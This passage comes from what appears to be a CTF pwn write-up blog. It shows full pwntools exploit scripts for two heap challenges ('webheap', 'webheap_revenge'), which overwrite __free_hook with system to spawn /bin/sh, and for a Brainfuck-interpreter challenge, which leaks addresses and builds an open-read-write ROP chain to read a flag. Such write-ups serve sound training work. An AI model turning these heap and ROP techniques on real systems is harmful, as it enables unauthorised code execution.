&quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    payload2=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload2+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">1</span>)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\xbd\x80&#x27;</span>+p8(<span class="number">1</span>)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: &quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload2)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload2)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx,content</span>):</span><br><span class="line">    payload=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">3</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\xbd\x83&#x27;</span>+p64(<span class="built_in">len</span>(content))</span><br><span class="line">    payload+=content</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: &quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):</span><br><span class="line">    add(i,<span class="number">0x400</span>,<span class="string">&#x27;aaaaa&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(i,<span class="number">0x400</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x300</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">raw_input()</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">libc_base=u64(p.recvline()[-<span class="number">7</span>:-<span class="number">1</span>].ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0x3ec090</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">free_hook=libc_base+libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0x4f2a5 execve(&quot;/bin/sh&quot;, rsp+0x40, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  rsp &amp; 0xf == 0</span></span><br><span class="line"><span class="string">  rcx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0x4f302 execve(&quot;/bin/sh&quot;, rsp+0x40, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsp+0x40] == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0x10a2fc execve(&quot;/bin/sh&quot;, rsp+0x70, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsp+0x70] == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">rce1=libc_base+<span class="number">0x4f2a5</span></span><br><span class="line">rce2=libc_base+<span class="number">0x4f302</span></span><br><span class="line">rce3=libc_base+<span class="number">0x10a2fc</span></span><br><span class="line"><span class="comment">#for i in range(7):</span></span><br><span class="line"><span class="comment">#    delete(i)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#edit(6,p64(free_hook-8))</span></span><br><span class="line"><span class="comment">#add(7,0x400,&#x27;a&#x27;)</span></span><br><span class="line"><span class="comment">#add(5,0x400,p64(rce1))</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#edit(5,p64(rce1))</span></span><br><span class="line"><span class="comment">#raw_input()</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(free_hook)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(i,<span class="number">0x80</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">edit(<span class="number">6</span>,p64(free_hook))</span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x80</span>)</span><br><span class="line">add(<span class="number">11</span>,<span class="number">0x80</span>)</span><br><span class="line">edit(<span class="number">11</span>,p64(system))</span><br><span class="line">edit(<span class="number">10</span>,<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">delete(<span class="number">10</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="webheap-revenge"><a href="#webheap-revenge" class="headerlink" title="webheap_revenge:"></a>webheap_revenge:</h2><p>This question is the same as the previous one. You can even directly use the above script function parameters to type it. I heard that it is an upgraded version of the previous question, but I did not see any upgrades. After passing the test, there is any heap overflow, which is better than the previous one. A little more complicated. It is when the heap is laid out, the layout is too messy, which leads to a period of self-closing, and then after re-layout, it can be played, directly hit freehook as system, and then rce</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&quot;./webheap_revenge&quot;</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;webheap_revenge&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;/home/roo/Desktop/tools/glibc-all-in-one-master/libs/2.27-3ubuntu1.5_amd64/libc.so.6&quot;</span>)</span><br><span class="line">se      = <span class="keyword">lambda</span> data               :p.send(data) </span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :p.sendline(data)</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)</span><br><span class="line">sea     = <span class="keyword">lambda</span> delim,data         :p.sendafter(delim, data)</span><br><span class="line">rc      = <span class="keyword">lambda</span> numb=<span class="number">4096</span>          :p.recv(numb)</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :p.recvuntil(delims, drop)</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>, <span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span class="number">8</span>, <span class="string">&#x27;\0&#x27;</span>))</span><br><span class="line">info_addr = <span class="keyword">lambda</span> tag, addr        :p.info(tag + <span class="string">&#x27;: &#123;:#x&#125;&#x27;</span>.<span class="built_in">format</span>(addr))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx,size,content=<span class="string">&#x27;jsjjs&#x27;</span></span>):</span><br><span class="line">    payload=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x83&#x27;</span>+p64(size)</span><br><span class="line">    payload+=<span class="string">b&#x27;\xbd\x83&#x27;</span>+p64(<span class="built_in">len</span>(content))</span><br><span class="line">    payload+=<span class="built_in">str</span>(content)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: &quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    payload=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">2</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\xbd\x80&#x27;</span>+p8(<span class="number">1</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: &quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    payload2=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload2+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">1</span>)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\xbd\x80&#x27;</span>+p8(<span class="number">1</span>)</span><br><span class="line">    payload2+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: &quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload2)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload2)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx,content</span>):</span><br><span class="line">    payload=<span class="string">b&#x27;\xB9\x80\x05&#x27;</span></span><br><span class="line">    payload+=<span class="string">b&#x27;\x84&#x27;</span>+p8(<span class="number">3</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(idx)</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    payload+=<span class="string">b&#x27;\xbd\x83&#x27;</span>+p64(<span class="built_in">len</span>(content))</span><br><span class="line">    <span class="comment">#payload+=bytes(content,encoding=&quot;utf-8&quot;)</span></span><br><span class="line">    payload+=content</span><br><span class="line">    payload+=<span class="string">b&#x27;\x80&#x27;</span>+p8(<span class="number">0</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;th: &quot;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(payload)))</span><br><span class="line">    p.sendafter(<span class="string">&quot;Content: &quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):</span><br><span class="line">    add(i,<span class="number">0x400</span>,<span class="string">&#x27;aaaaa&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(i,<span class="number">0x400</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">0x300</span>,<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">libc_base=u64(p.recvline()[-<span class="number">7</span>:-<span class="number">1</span>].ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0x3ec090</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">free_hook=libc_base+libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0x4f2a5 execve(&quot;/bin/sh&quot;, rsp+0x40, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  rsp &amp; 0xf == 0</span></span><br><span class="line"><span class="string">  rcx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0x4f302 execve(&quot;/bin/sh&quot;, rsp+0x40, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsp+0x40] == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0x10a2fc execve(&quot;/bin/sh&quot;, rsp+0x70, environ)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string">  [rsp+0x70] == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">rce1=libc_base+<span class="number">0x4f2a5</span></span><br><span class="line">rce2=libc_base+<span class="number">0x4f302</span></span><br><span class="line">rce3=libc_base+<span class="number">0x10a2fc</span></span><br><span class="line"><span class="comment">#for i in range(7):</span></span><br><span class="line"><span class="comment">#    delete(i)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#edit(6,p64(free_hook-8))</span></span><br><span class="line"><span class="comment">#add(7,0x400,&#x27;a&#x27;)</span></span><br><span class="line"><span class="comment">#add(5,0x400,p64(rce1))</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#edit(5,p64(rce1))</span></span><br><span class="line"><span class="comment">#raw_input()</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(free_hook)</span><br><span class="line"><span class="comment">#for i in range(7):</span></span><br><span class="line"><span class="comment">#    add(i,0x80)</span></span><br><span class="line"><span class="comment">#for i in range(7):</span></span><br><span class="line"><span class="comment">#    delete(i)</span></span><br><span class="line"><span class="comment">#edit(6,p64(free_hook))</span></span><br><span class="line"><span class="comment">#add(10,0x80)</span></span><br><span class="line"><span class="comment">#add(11,0x80)</span></span><br><span class="line"><span class="comment">#edit(11,p64(system))</span></span><br><span class="line"><span class="comment">#edit(10,&#x27;/bin/sh\x00&#x27;)</span></span><br><span class="line"><span class="comment">#delete(10)</span></span><br><span class="line">delete(<span class="number">6</span>)</span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">edit(<span class="number">5</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x400</span>+p64(<span class="number">0</span>)+p64(<span class="number">0x411</span>)+p64(free_hook))</span><br><span class="line">add(<span class="number">10</span>,<span class="number">0x400</span>)</span><br><span class="line">add(<span class="number">11</span>,<span class="number">0x400</span>)</span><br><span class="line">edit(<span class="number">10</span>,<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">edit(<span class="number">11</span>,p64(system))</span><br><span class="line">delete(<span class="number">10</span>)</span><br><span class="line">gdb.attach(p)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>BF：</p>
<h3 id="This-question-is-an-original-question-of-the-Southwest-Division-Competition-which-directly-uses-the-script-of-Master-Kot-to-type-the-leaked-address-This-question-limits-the-fd-of-read-and-you-can-just-close-it-directly-This-question-comes-out-after-the-game-and-the-complicated-point-is-the-fd-But-close-0-can-change-fd"><a href="#This-question-is-an-original-question-of-the-Southwest-Division-Competition-which-directly-uses-the-script-of-Master-Kot-to-type-the-leaked-address-This-question-limits-the-fd-of-read-and-you-can-just-close-it-directly-This-question-comes-out-after-the-game-and-the-complicated-point-is-the-fd-But-close-0-can-change-fd" class="headerlink" title="This question is an original question of the Southwest Division Competition, which directly uses the script of Master Kot to type the leaked address. This question limits the fd of read, and you can just close it directly. This question comes out after the game, and the complicated point is the fd. But close(0) can change fd"></a>This question is an original question of the Southwest Division Competition, which directly uses the script of Master Kot to type the leaked address. This question limits the fd of read, and you can just close it directly. This question comes out after the game, and the complicated point is the fd. But close(0) can change fd</h3><p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"><span class="comment"># p = remote(&#x27;192.168.0.76&#x27;, 58011)</span></span><br><span class="line"><span class="comment"># p.recvuntil(&#x27;TEST&#x27;)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">pop_rdi = 0x0000000000000973 # pop rdi ; ret</span></span><br><span class="line"><span class="string">ret = 0x000000000000001a # ret</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">pay = <span class="string">&#x27;+[&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;,]&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line">pay += <span class="string">&#x27;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&#x27;</span>*<span class="number">2</span></span><br><span class="line">pay += <span class="string">&#x27;.&gt;&#x27;</span>*<span class="number">8</span></span><br><span class="line">pay += <span class="string">&#x27;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line">pay += <span class="string">&#x27;.&gt;&#x27;</span>*<span class="number">8</span></span><br><span class="line">pay += <span class="string">&#x27;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&#x27;</span>*<span class="number">5</span></span><br><span class="line"></span><br><span class="line">pay += <span class="string">&#x27;.&gt;&#x27;</span>*<span class="number">8</span></span><br><span class="line">pay += <span class="string">&#x27;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&#x27;</span></span><br><span class="line">pay += <span class="string">&#x27;,&gt;&#x27;</span>*<span class="number">8</span> * <span class="number">22</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># pay += &#x27;.&#x27;</span></span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">dd = <span class="string">&#x27;0&#x27;</span>*<span class="number">0x40</span> + <span class="string">&#x27;\x00&#x27;</span></span><br><span class="line">p.sendline(pay)</span><br><span class="line">raw_input()</span><br><span class="line">p.send(dd)</span><br><span class="line"></span><br><span class="line">stack = u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0xf0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(stack))</span><br><span class="line"></span><br><span class="line">pie = u64(p.recvuntil(<span class="string">b&#x27;\x55&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">0x854</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(pie))</span><br><span class="line"></span><br><span class="line">libcbase = u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">0x8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - <span class="number">0x24083</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libcbase))</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">one = [0xe3afe, 0xe3b01, 0xe3b04]</span></span><br><span class="line"><span class="string"># print(hex(libcbase + one[0]))</span></span><br><span class="line"><span class="string">p.sendline(p64(one[2]+libcbase))</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">pop_rdi = libcbase + <span class="number">0x0000000000023b6a</span> <span class="comment"># pop rdi ; ret</span></span><br><span class="line">pop_rsi = libcbase + <span class="number">0x000000000002601f</span> <span class="comment"># pop rsi ; ret</span></span><br><span class="line">pop_rdx = libcbase + <span class="number">0x0000000000142c92</span> <span class="comment"># pop rdx ; ret</span></span><br><span class="line">op = libcbase + libc.symbols[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line">re = libcbase + libc.symbols[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">wr = libcbase + libc.symbols[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">pop_rax=libcbase+libc.search(asm(<span class="string">&quot;pop rax\nret&quot;</span>)).<span class="built_in">next</span>()</span><br><span class="line">close=libcbase+libc.sym[<span class="string">&#x27;close&#x27;</span>]</span><br><span class="line">syscall=libcbase+libc.search(asm(<span class="string">&quot;syscall\nret&quot;</span>)).<span class="built_in">next</span>()</span><br><span class="line">payload1=p64(pop_rdi)+p64(<span class="number">0</span>)+p64(close)+p64(pop_rdi)</span><br><span class="line">payload+=p64(stack+<span class="number">8</span>*<span class="number">21</span>)+p64(pop_rsi)+p64(<span class="number">0</span>)+p64(pop_rax)+p64(<span class="number">2</span>)+p64(syscall)</span><br><span class="line">payload+=p64(pop_rdi)+p64(<span class="number">0</span>)+p64(pop_rsi)+p64(stack+<span class="number">8</span>*<span class="number">21</span>)+p64(pop_rdx)+p64(<span class="number">0x50</span>)</span><br><span class="line">payload+=p64(<span class="number">0</span>)+p64(re)+p64(pop_rdi)+p64(<span class="number">1</span>)+p64(wr)+<span class="string">&#x27;flag\x00\x00&#x27;</span></span><br><span class="line"></span><br><span class="line">p.send(payload1)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>Summary: This question is difficult for me. It is difficult to reverse the code and debug. After debugging for a long time, I actually feel that these two questions are very good, because some time ago, many competitions put the questions in the latest libc, because it is impossible in actual combat. When I encounter new libc, I rarely encounter libc in actual combat. Even if I encounter libc, the version is relatively old. However, the two questions in this competition have increased the amount of code (inverse vector). Such questions are closer to actual combat and can be enhanced. In fact, the reverse ability and code audit are not pwn. In this web question, they are closer to actual combat. I feel that future competitions will be closer to actual combat.</strong></p>

                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/pwn/">pwn</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="article-nav">
                        
                            <div class="article-prev">
                                <a class="prev"
                                   rel="prev"
                                   href="/2022/10/03/%E9%9D%9E%E5%B8%B8%E8%A7%84PWN/"
                                   title="非常规PWN"
                                >
                                    <span class="left arrow-icon flex-center">
                                      <i class="fas fa-chevron-left"></i>
                                    </span>
                                            <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">非常规PWN</span>
                                        <span class="post-nav-item">Prev posts</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="article-next">
                                <a class="next"
                                   rel="next"
                                   href="/2022/10/01/house-of-botcake/"
                                   title="house_of_botcake"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">house_of_botcake</span>
                                        <span class="post-nav-item">Next posts</span>
                                    </span>
                                            <span class="right arrow-icon flex-center">
                                      <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    


    <div class="comments-container border-box">
        <div id="comments-anchor" class="comment-area-title border-box">
            <i class="fas fa-comments"></i>&nbsp;Comments
        </div>
        
            

    <div class="valine-container">
        <script  src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
        <div id="vcomments"></div>
        <script >
          function loadValine() {

            const config = {
              el: '#vcomments',
